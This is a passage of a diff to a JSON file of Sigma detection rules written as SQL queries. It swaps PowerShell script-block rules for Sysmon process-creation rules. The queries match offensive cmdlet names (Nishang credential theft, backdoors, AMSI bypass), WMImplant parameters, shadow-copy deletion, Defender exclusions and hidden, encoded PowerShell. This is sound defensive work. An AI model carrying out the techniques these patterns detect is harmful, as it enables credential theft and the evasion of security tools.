OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Suspicious Hyper-V Cmdlets", - "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "title": "Powershell Defender Exclusion", + "id": "17769c90-230e-488b-a463-e05c08e9d48f", "status": "experimental", - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "author": "frack113", + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.006" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_hyper_v_condlet.yml" + "filename": "proc_creation_win_powershell_defender_exclusion.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsScript", - "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE 
'%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" ], - "filename": "posh_ps_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.t1003" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Diagnostics" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 
'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", - "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", + "status": "experimental", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Administrative scripts that use the same keywords." 
+ "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmimplant.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Suspicious Get Information for SMB Share", - "id": "95f0643a-ed40-467c-806b-aac9542ec5ab", - "status": "test", - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and 
to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "author": "frack113", + "title": "Download Arbitrary Files Via MSOHTMED.EXE", + "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "status": "experimental", + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-smbshare%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_smb_share_reco.yml" + "filename": "proc_creation_win_lolbin_msohtmed_download.yml" }, { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "title": "New User Created Via Net.EXE", + "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "status": "test", + "description": "Identifies the creation of local users via the net.exe command.", + "author": "Endgame, 
JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_net_user_add.yml" }, { - "title": "Suspicious Process Discovery With Get-Process", - "id": "af4c87ce-bdda-4215-b998-15220772e993", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Get the processes that are running on the local computer.", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.discovery", - "attack.t1057" + "attack.privilege_escalation", + 
"attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_process.yml" - }, - { - "title": "Detected Windows Software Discovery - PowerShell", - "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "status": "experimental", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + }, + { + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.defense_evasion", + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], 
- "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_software_discovery.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Suspicious New-PSDrive to Admin Share", - "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\' OR Image LIKE '%.scr' ESCAPE '\\')) AND NOT ((Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\'))) AND NOT ((Image IN ('-', '')) OR (Image = '') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR (Image 
LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_new_psdrive.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Delete Volume Shadow 
Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "New Kernel Driver Via SC.EXE", + "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "status": "experimental", + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Rare legitimate installation of kernel drivers via sc.exe" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_sc_new_kernel_driver.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), 
Jonhnathan Ribeiro", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' 